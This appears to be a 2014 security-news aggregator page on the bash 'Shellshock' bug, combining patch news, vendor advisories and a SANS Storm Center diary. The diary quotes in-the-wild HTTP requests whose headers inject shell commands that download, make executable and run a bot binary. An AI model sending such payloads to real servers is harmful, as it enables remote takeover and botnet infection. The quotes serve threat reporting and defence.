It's now bash-a-mole.

Remember when we said that a new patch had fixed the problems with the last patch to fix the rated-highly-dangerous “Shellshock” bug in the GNU Bourne Again Shell (bash)? You know, that bug that could allow an attacker to remotely execute code on a Linux or Unix system running some configurations of Apache, or perhaps the Git software version control system, DHCP network configuration or any number of other pieces of software that use bash to interact with the underlying operating system? Well, the new patch may not be a complete fix—and there may be vulnerabilities all the way down in the bash code.

Here's how the Shellshock vulnerability works, in a nutshell: an attacker sends a request to a Web server (or Git, a DHCP client, or anything else affected) that uses bash internally to interact with the operating system. This request includes data stored in an environmental variable. Environmental variables are like a clipboard for operating systems, storing information used to help it and software running on it know where to look for certain files or what configuration to start with. But in this case, the data is malformed so as to trick bash into treating it as a command, and that command is executed as part of what would normally be a benign set of script. This ability to trick bash is the shellshock bug. As a result, the attacker can run programs with the same level of access as the part of the system launching a bash shell. And in the case of a web server, that's practically the same level of access as an administrator, giving the attacker a way to gain full control of the targeted system.

David A. Wheeler, a computer scientist who is an acknowledged expert in developing secure open-source code, posted a message to the Open Source Software Security (oss-sec) list this evening urging more changes to the bash code. And other developers have found that the current patch still has vulnerabilities similar to the original one, where an attacker could store malicious data in a variable named the same thing as frequently run commands.

Read 6 remaining paragraphs | Comments



At the Storm Center, we are strict and judicious on moving the InfoCon status. We felt, after dialog, that Yellow is warranted in this case as we are seeing signs of worm/botnet activity. This combined with so many systems are impacted [worm], with no signs of letting up [met].

We will monitor this closely and relax InfoCon when the situation seems to be more stable.

Some example requests currently probing for the vulnerability:

GET /cgi-bin/test.sh HTTP/1.0
Host: [host ip address]
User-Agent: () { :;}; /bin/bash -c "wget -O /var/tmp/ec.z;chmod +x /var/tmp/ec.z;/var/tmp/ec.z;rm -rf /var/tmp/ec.z*"

ec.z is an obfuscated perl script launching an IRC bot. 

This second attack uses multiple headers. We have not yet recovered the 'nginx' binary.

GET /cgi-sys/defaultwebpage.cgi HTTP/1.1
Host: () { :;}; wget -O /tmp/syslogd; chmod 777 /tmp/syslogd; /tmp/syslogd;
User-Agent: () { :;}; wget -O /tmp/syslogd; chmod 777 /tmp/syslogd; /tmp/syslogd;
Cookie: () { :;}; wget -O /tmp/syslogd; chmod 777 /tmp/syslogd; /tmp/syslogd;
Referer: () { :;}; wget -O /tmp/syslogd; chmod 777 /tmp/syslogd; /tmp/syslogd;

In addition, we have seen numerous scans that will just probe the vulnerability.

[met] https://github.com/rapid7/metasploit-framework/pull/3891
[worm] http://www.itnews.com.au/News/396197,first-shellshock-botnet-attacks-akamai-us-dod-networks.aspx



Richard W. Porter

rporter at isc dot sans dot edu || @packetalien

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

Update, 9/26 11:00 PM ET: The most recent patches issued for the "Shellshock" bug have apparently still left avenues of attack, based on the analysis of several open source developers. See the latest report for further information.

After the discovery that a patch designed to repair the “Shellshock” vulnerability in the GNU Bourne Again Shell (bash) still allowed for an attacker to execute commands on a remote system, Red Hat, Ubuntu, and other Linux distribution providers have pushed out a second fix to the vulnerability. At the same time, security researchers and service providers have detected a surge in scans for systems with the vulnerability, as would-be attackers seek to take advantage of the bug.

“Shellshock” has been compared to the Heartbleed bug discovered in the OpenSSL cryptography library in April because of its potential severity and its widespread nature. Like Heartbleed, the Shellshock vulnerabilities were introduced by errors in coding years ago—errors made by an unpaid volunteer writing code that would end up in millions of computer systems.

Read 3 remaining paragraphs | Comments

Go TLS Server Implementation Security Bypass Vulnerability
LinuxSecurity.com: It was found that the fix for CVE-2014-6271 was incomplete, and Bash still allowed certain characters to be injected into other environments via specially crafted environment variables. An attacker could potentially use this flaw to override or bypass environment restrictions to execute shell commands. Certain [More...]
LinuxSecurity.com: Security Report Summary
LinuxSecurity.com: Updated nss packages that fix one security issue are now available for Red Hat Enterprise Linux 5, 6, and 7. Red Hat Product Security has rated this update as having Important security [More...]
LinuxSecurity.com: Bash allowed bypassing environment restrictions in certain environments.
LinuxSecurity.com: Updated bash packages that fix one security issue are now available for Red Hat Enterprise Linux 5, 6, and 7. Red Hat Product Security has rated this update as having Important security [More...]
LinuxSecurity.com: Bash allowed bypassing environment restrictions in certain environments.
LinuxSecurity.com: New bash packages are available for Slackware 13.0, 13.1, 13.37, 14.0, 14.1, and -current to fix a security issue. [More Info...]
LinuxSecurity.com: Security Report Summary

Apple has responded to concerns about “Shellshock,” a pair of vulnerabilities in versions of the GNU Bourne-Again Shell (bash), issuing a statement that the company is “working to quickly provide a fix” to the vulnerability. However, a company spokesperson said that most Mac OS X users have nothing to fear.

In an email to Ars Technica, an Apple spokesperson provided the following statement from the company:

"The vast majority of OS X users are not at risk to recently reported bash vulnerabilities. Bash, a UNIX command shell and language included in OS X, has a weakness that could allow unauthorized users to remotely gain control of vulnerable systems. With OS X, systems are safe by default and not exposed to remote exploits of bash unless users configure advanced UNIX services. We are working to quickly provide a software update for our advanced UNIX users.”

Update: Chet Ramey, the maintainer of bash, said in a post to Twitter that he had notified Apple of the vulnerability several times before it was made public, "and sent a patch they can apply. Several messages." So it's not certain why Apple hasn't already packaged that fix for release, other than

Read 1 remaining paragraphs | Comments

EMC AlphaStor Format String and Command Injection Vulnerabilities
SmarterTools Smarter Track 6-10 - Information Disclosure Vulnerability
Oracle Corporation MyOracle - Persistent Vulnerability
GS Foto Uebertraeger v3.0 iOS - File Include Vulnerability
Paypal Inc Bug Bounty #32 - Multiple Persistent Vulnerabilities
Paypal Inc Bug Bounty #16 - Persistent Mail Encoding Vulnerability

Posted by InfoSec News on Sep 26


By John E. Dunn
26 September 2014

Britain’s banks are to start using a new alerting system that will make it
easier for a range of police and government agencies to warn its members
of of cyberattacks and frauds in real time.

Going live in early 2015 in partnership with BAE Systems Applied
Intelligence, the Financial Crime...
Cart Engine Multiple Security Vulnerabilities
HAProxy Multiple Buffer Overflow Vulnerabilities

Posted by InfoSec News on Sep 26


By Sean Gallagher
Ars Technica
Sept 25, 2014

The vulnerability reported in the GNU Bourne Again Shell (Bash) yesterday,
dubbed "Shellshock," may already have been exploited in the wild to take
over Web servers as part of a botnet. More security experts are now
weighing in on the severity of the bug, expressing fears that...

Posted by InfoSec News on Sep 26


By Jessica Herrera-Flanigan
September 25, 2014

Next Wednesday marks the beginning of the 11th annual Cybersecurity
Awareness Month.

The Department of Homeland Security says the month is designed to “engage
and educate public and private sector partners through events and
initiatives with the goal of raising awareness about...

Posted by InfoSec News on Sep 26


By William Knowles @c4i
Senior Editor
InfoSec News
September 24, 2014

Somewhat Freaky Fast Notification.

Champaign Illinois based Jimmy John’s Gourmet Sandwiches Shops have
announced on Wednesday they were the latest business to suffer a credit
card breach. Joining the ranks of Target, Neiman Marcus, Michaels, and
Home Depot.

Here’s the company...

Posted by InfoSec News on Sep 26


Los Angeles Times
Sept 25, 2014

Hey, what's Thor doing sitting at a computer terminal? Saving the day, of

Chris Hemsworth, best known for his role as an Asgardian superhero in
Marvel's "Thor" and "Avengers" movies, has traded his hammer for a
keyboard in the...

Posted by InfoSec News on Sep 26


By Tim Greene
Sept 24, 2014

A new malware kit called Spike can infect not only traditional desktops
but also routers, smart thermostats, smart dryers and a host of other
Internet of Things devices to herd them into massive botnets.

Spike botnets have carried out various forms...

Posted by InfoSec News on Sep 26


By Cadie Thompson
Sept 25, 2014

Hacking medical data has become a booming business, and attacks against
hospitals are up 600 percent in 2014, a security company CEO told CNBC.

The increase in data-sharing, and the growth of the Internet of everything
may be good for medicine, but it's creating a security nightmare for the
health-care industry, said John McCormack, chief executive...
[ MDVSA-2014:190 ] bash
[SECURITY] [DSA 3036-1] mediawiki security update
Cisco Security Advisory: GNU Bash Environmental Variable Command Injection Vulnerability
[slackware-security] bash (rebuild for Slackware 13.0 only) (SSA:2014-268-02)
[SECURITY] [DSA 3035-1] bash security update
Microsoft Internet Explorer CVE-2014-4067 Remote Memory Corruption Vulnerability
Internet Storm Center Infocon Status